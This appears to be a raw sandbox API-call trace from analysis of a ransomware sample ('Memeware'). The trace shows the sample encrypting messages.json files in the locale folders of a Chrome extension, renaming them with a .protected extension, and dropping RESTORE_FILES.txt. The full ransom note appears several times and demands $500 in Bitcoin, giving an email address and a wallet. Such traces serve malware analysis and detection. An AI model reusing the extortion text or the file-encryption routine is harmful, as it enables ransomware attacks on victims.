hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.480] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.480] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.481] CloseHandle (hObject=0x168) returned 1 [0080.481] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.protected") returned 166 [0080.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.protected")) returned 1 [0080.481] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.481] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.481] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\RESTORE_FILES.txt") returned 160 [0080.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.482] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.482] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.483] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.484] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.484] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.484] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.484] CloseHandle (hObject=0x164) returned 1 [0080.484] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.484] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0080.484] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0080.484] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0080.484] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0080.484] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0080.484] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr") returned 141 [0080.484] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0080.484] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0080.484] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\*") returned 143 [0080.484] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.485] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.485] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.485] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.486] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.486] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\.") returned 143 [0080.486] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.486] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.486] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.486] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.486] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.486] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.486] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\..") returned 144 [0080.486] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.486] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.486] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.486] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.486] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.486] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.486] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.486] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json") returned 155 [0080.486] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.486] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.486] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.486] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.486] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.487] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json") returned 155 [0080.487] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.487] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json") returned 155 [0080.487] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.487] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json") returned 155 [0080.487] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.488] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xbb, lpOverlapped=0x0) returned 1 [0080.488] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff45, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.488] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xbb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xbb, lpOverlapped=0x0) returned 1 [0080.489] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.489] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.489] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.489] CloseHandle (hObject=0x168) returned 1 [0080.489] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.protected") returned 165 [0080.489] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.protected")) returned 1 [0080.490] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.490] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.490] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\RESTORE_FILES.txt") returned 159 [0080.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.491] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.491] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.492] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.492] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.492] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.492] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.492] CloseHandle (hObject=0x164) returned 1 [0080.492] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.492] lstrcmpiW (lpString1="fr_CA", lpString2="Windows") returned -1 [0080.492] lstrcmpiW (lpString1="fr_CA", lpString2="Program Files") returned -1 [0080.492] lstrcmpiW (lpString1="fr_CA", lpString2="Program Files (x86)") returned -1 [0080.492] lstrcmpiW (lpString1="fr_CA", lpString2="$Recycle.bin") returned 1 [0080.492] lstrcmpiW (lpString1="fr_CA", lpString2="System Volume Information") returned -1 [0080.492] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA") returned 144 [0080.492] lstrcmpW (lpString1="fr_CA", lpString2=".") returned 1 [0080.492] lstrcmpW (lpString1="fr_CA", lpString2="..") returned 1 [0080.492] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\*") returned 146 [0080.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.493] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.493] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.493] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.493] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.493] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.493] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\.") returned 146 [0080.493] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.493] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.493] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.494] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.494] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.494] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.494] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.494] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\..") returned 147 [0080.494] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.494] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.494] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.494] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.494] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.494] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.494] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.494] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.494] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json") returned 158 [0080.494] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.494] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.494] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.494] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.495] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json") returned 158 [0080.495] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.495] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json") returned 158 [0080.495] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.495] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json") returned 158 [0080.495] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.495] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0080.496] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.496] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0080.496] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.496] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, 